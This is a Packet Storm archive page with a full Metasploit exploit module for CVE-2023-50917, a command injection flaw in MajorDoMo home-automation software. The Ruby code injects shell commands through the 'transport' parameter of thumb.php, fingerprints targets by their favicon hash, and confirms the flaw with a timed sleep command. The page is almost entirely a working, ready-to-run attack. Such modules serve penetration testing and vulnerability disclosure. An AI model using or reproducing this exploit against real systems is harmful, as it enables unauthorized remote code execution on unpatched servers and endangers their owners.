what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MajorDoMo Command Injection

MajorDoMo Command Injection
Posted Jan 22, 2024
Authored by Valentin Lobstein, smcintyre-r7 | Site metasploit.com

This Metasploit module exploits a command injection vulnerability in MajorDoMo versions before 0662e5e.

tags | exploit
advisories | CVE-2023-50917
SHA-256 | a64c3d5f624bfad203f1e2566417514a7d618f792becc950fdc3d537aaa74a64

MajorDoMo Command Injection

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'MajorDoMo Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in MajorDoMo
versions before 0662e5e.
},
'Author' => [
'Valentin Lobstein', # Vulnerability discovery and Metasploit Module
'smcintyre-r7', # Assistance
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2023-50917'],
['URL', 'https://github.com/Chocapikk/CVE-2023-50917'],
['URL', 'https://chocapikk.com/posts/2023/cve-2023-50917'],
['URL', 'https://github.com/sergejey/majordomo'] # Vendor URL
],
'DisclosureDate' => '2023-12-15',
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
},
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Targets' => [['Automatic', {}]],
'Privileged' => false
)
)

register_options([
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'The URI path to MajorDoMo', '/']),
])
end

def execute_command(cmd)
send_request_cgi(
'uri' => normalize_uri(datastore['TARGETURI'], 'modules', 'thumb', 'thumb.php'),
'method' => 'GET',
'vars_get' => {
'url' => Rex::Text.encode_base64('rtsp://'),
'debug' => '1',
'transport' => "|| $(#{cmd});"
}
)
end

def exploit
execute_command(payload.encoded)
end

def check
print_status("Checking if #{peer} can be exploited!")
res = send_request_cgi(
'uri' => normalize_uri(datastore['TARGETURI'], 'favicon.ico'),
'method' => 'GET'
)

unless res && res.code == 200
return CheckCode::Unknown('Did not receive a response from target.')
end

unless Rex::Text.md5(res.body) == '08d30f79c76f124754ac6f7789ca3ab1'
return CheckCode::Safe('The target is not MajorDoMo.')
end

print_good('Target is identified as MajorDoMo instance')
sleep_time = rand(5..10)
print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
res, elapsed_time = Rex::Stopwatch.elapsed_time do
execute_command("sleep #{sleep_time}")
end
print_status("Elapsed time: #{elapsed_time} seconds.")
unless res && elapsed_time >= sleep_time
return CheckCode::Safe('Failed to test command injection.')
end

CheckCode::Vulnerable('Successfully tested command injection.')
end
end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close